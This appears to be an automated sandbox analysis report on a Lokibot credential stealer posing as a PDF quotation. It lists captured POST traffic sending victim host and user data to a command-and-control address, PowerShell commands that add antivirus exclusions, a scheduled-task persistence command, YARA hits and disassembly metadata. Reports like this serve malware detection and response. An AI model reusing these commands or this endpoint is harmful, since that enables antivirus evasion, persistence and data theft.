Jan 7, 2025 12:33:58.239631891 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:58.979218006 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:58 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.4	50137	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:59.123577118 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:59.128388882 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:59.832437992 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:59 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.4	50138	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:59.974517107 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:59.979403019 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:34:00.722080946 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:34:00 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.4	50139	94.156.177.41	80

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:34:01.019305944 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:34:01.024157047 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:34:01.830324888 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:34:01 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Target ID:	0
Start time:	06:31:54
Start date:	07/01/2025
Path:	C:\Users\user\Desktop\Quotation2025-0107pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Quotation2025-0107pdf.exe"
Imagebase:	0xce0000
File size:	725'512 bytes
MD5 hash:	FF0A37E1048052C58526A9C38EFC1954
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1720797556.0000000009A00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1714510226.0000000004AC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:31:57
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation2025-0107pdf.exe"
Imagebase:	0xb20000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:31:57
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:31:57
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mexnJkivovwH.exe"
Imagebase:	0xb20000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:31:57
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:31:57
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp2404.tmp"
Imagebase:	0x430000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:31:57
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:31:58
Start date:	07/01/2025
Path:	C:\Users\user\Desktop\Quotation2025-0107pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Quotation2025-0107pdf.exe"
Imagebase:	0x4e0000
File size:	725'512 bytes
MD5 hash:	FF0A37E1048052C58526A9C38EFC1954
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000008.00000002.2909417745.0000000000A92000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	06:32:00
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Roaming\mexnJkivovwH.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\mexnJkivovwH.exe
Imagebase:	0x90000
File size:	725'512 bytes
MD5 hash:	FF0A37E1048052C58526A9C38EFC1954
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1751386297.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1751386297.0000000003CEA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 24%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	06:32:00
Start date:	07/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	06:32:03
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mexnJkivovwH" /XML "C:\Users\user\AppData\Local\Temp\tmp36D0.tmp"
Imagebase:	0x430000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	06:32:03
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	06:32:03
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Roaming\mexnJkivovwH.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\mexnJkivovwH.exe"
Imagebase:	0x8c0000
File size:	725'512 bytes
MD5 hash:	FF0A37E1048052C58526A9C38EFC1954
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	14.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	6.8%
Total number of Nodes:	219
Total number of Limit Nodes:	14

Executed Functions

Function 0A1B0730 Relevance: 8.5, Strings: 6, Instructions: 1029
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 0A1B1327
\ lw, xrefs: 0A1B0B39
pbq, xrefs: 0A1B13FE
TJcq, xrefs: 0A1B08D6
Te^q, xrefs: 0A1B0F87
xbaq, xrefs: 0A1B0860

Memory Dump Source

Source File: 00000000.00000002.1724132161.000000000A1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A1B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1b0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID: 4'^q$TJcq$Te^q$\ lw$pbq$xbaq
API String ID: 0-129839065
Opcode ID: 09b3906f2279144eef6ef4def95d6b2eaf0c304b4a95743dd59cb4c2f9b78de4
Instruction ID: b5001fccacca62168847858e5aa0031f3ec95ffe22a244c4749a347e9923c1ea
Opcode Fuzzy Hash: 09b3906f2279144eef6ef4def95d6b2eaf0c304b4a95743dd59cb4c2f9b78de4
Instruction Fuzzy Hash: 4BB2C275E00228DFDB64CF69C984AD9BBB2FF89304F1581E9D509AB265DB319E81CF40

Function 018C35F9 Relevance: 2.8, Strings: 2, Instructions: 292
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_#s\, xrefs: 018C3733
?",<, xrefs: 018C39C4

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID: ?",<$_#s\
API String ID: 0-748467163
Opcode ID: 0cabd7f161e509551276b51ec90a2560cd451efa71835680e4413ddd5d0ee96e
Instruction ID: 6823eeab698922e8a68b23cfc884cd9f45df9698ce960a3e474f79c94968edb2
Opcode Fuzzy Hash: 0cabd7f161e509551276b51ec90a2560cd451efa71835680e4413ddd5d0ee96e
Instruction Fuzzy Hash: E5D10670A0524ADFCB04CFA9D5848AEFBB2FF89740B14D55AD816AB314D734EA42CF94

Function 018C3610 Relevance: 2.8, Strings: 2, Instructions: 290
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_#s\, xrefs: 018C3733
?",<, xrefs: 018C39C4

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID: ?",<$_#s\
API String ID: 0-748467163
Opcode ID: 8222012a7b0bdd1e1e2fbf97b1af3e436b5cbb7097d0bc1cbf483e72b172f68d
Instruction ID: 343455265b9a5bdb373b11d9815dd98d36f53cbcaefe7f890a8dc3f16ad5e335
Opcode Fuzzy Hash: 8222012a7b0bdd1e1e2fbf97b1af3e436b5cbb7097d0bc1cbf483e72b172f68d
Instruction Fuzzy Hash: 2CD1E270E0520ADFCB04CFA9D5848AEFBB2FB89740B54D559D816AB314D734EA82CF94

Function 018C143F Relevance: 2.7, Strings: 2, Instructions: 211
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 018C168C
Te^q, xrefs: 018C14E1

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID: Te^q$Te^q
API String ID: 0-3743469327
Opcode ID: 9c3e0ad2b01d9ae835aa32a782efe382097cd11258bdea705db448f69a7828dd
Instruction ID: 977dc0dbec3ab548abff132512b22d394bd9f997b83594f5fade4ab9962ed811
Opcode Fuzzy Hash: 9c3e0ad2b01d9ae835aa32a782efe382097cd11258bdea705db448f69a7828dd
Instruction Fuzzy Hash: 5A91E874E01249CFDB08CFA9D8846ADFBB2FF89704F24842AE415AB355D7359A06CF54

Function 018C1478 Relevance: 2.7, Strings: 2, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 018C168C
Te^q, xrefs: 018C14E1

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID: Te^q$Te^q
API String ID: 0-3743469327
Opcode ID: 80e7db3fb41a2c678d5a01736d4988ef9305ae3724a017f077e64b8500c72600
Instruction ID: d91cfa279a91bf7fc5eea321fe12f36c011d739ff601a520117b636cb7c9df60
Opcode Fuzzy Hash: 80e7db3fb41a2c678d5a01736d4988ef9305ae3724a017f077e64b8500c72600
Instruction Fuzzy Hash: 2981B374E01219CFDB08CFA9D984AAEFBB2FF88700F14842AD816AB355D7319905CF54

Function 018C07F4 Relevance: 1.6, APIs: 1, Instructions: 103nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 018C980D

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: ce498485ff5b62d074a00da9520cefd7bde5fce8cf275bc0f512b53fb165f6c8
Instruction ID: 590713844dccf5cc2045dc03900372ef7acc9d08db00ff4f99c228d8a2f1f32e
Opcode Fuzzy Hash: ce498485ff5b62d074a00da9520cefd7bde5fce8cf275bc0f512b53fb165f6c8
Instruction Fuzzy Hash: F94166B8D04258DFCB10CFAAD984A9EFBB1BB09314F10906AE914B7310D335A905CF64

Function 018C9751 Relevance: 1.6, APIs: 1, Instructions: 102nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 018C980D

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 692f46221b8e7a902d200f741adb9de1bd890e0067e25f23eae95d76529d34fa
Instruction ID: a0ac52a23d466e2a4deee41dcc103e0efe138c282ebac1c4f5595f02dfdbb665
Opcode Fuzzy Hash: 692f46221b8e7a902d200f741adb9de1bd890e0067e25f23eae95d76529d34fa
Instruction Fuzzy Hash: 674168B9D00258DFCB10CFAAD984A9EFBB1BB09310F10A06AE914B7310D335A945CF64

Function 018CA298 Relevance: 1.5, Strings: 1, Instructions: 258COMMON

Download Yara Rule

Strings

~r:H, xrefs: 018CA371

Memory Dump Source

Source File: 00000000.00000002.1712638644.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c0000_Quotation2025-0107pdf.jbxd

Similarity

API ID: CloseHandle
String ID: ~r:H
API String ID: 2962429428-2692719446
Opcode ID: 362a324820399225cd99fa3154c01601edaf005b9854a588bc3ba4b319fdfb32
Instruction ID: ab9114dff736bf232a529dd896e4cfb40dc8dac85b5a42c2be88dd6780741964
Opcode Fuzzy Hash: 362a324820399225cd99fa3154c01601edaf005b9854a588bc3ba4b319fdfb32
Instruction Fuzzy Hash: 65B12870E0522DDFDB18DFE9D884A9DBBB2FB88704F10856DD405AB258EB349A41CF15

Function 0A08B260 Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1723179639.000000000A080000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a080000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 773768622cdbd7580ffb5c7d6ce84a113e5e49570530b81e39edca643edeee19
Instruction ID: 00e5af823db2226a66c48475a209c6a17f3f72552ebcf0a3ce3812861a58a32a
Opcode Fuzzy Hash: 773768622cdbd7580ffb5c7d6ce84a113e5e49570530b81e39edca643edeee19
Instruction Fuzzy Hash: 1C223A71A10219CFDB64EF68C884BADB7F1BF48300F1481A9D44AEB255DB74AD85CF54

Function 12512A30 Relevance: .4, Instructions: 405COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726298566.0000000012510000.00000040.00000800.00020000.00000000.sdmp, Offset: 12510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12510000_Quotation2025-0107pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 497f625e7ae0b31523fcca2e6cfed20f545b342668c42732571b47868fe9ada1
Instruction ID: efdd15fcdc0a095985d72177cca3d9c21777b3596e120be2341ce636b3991882
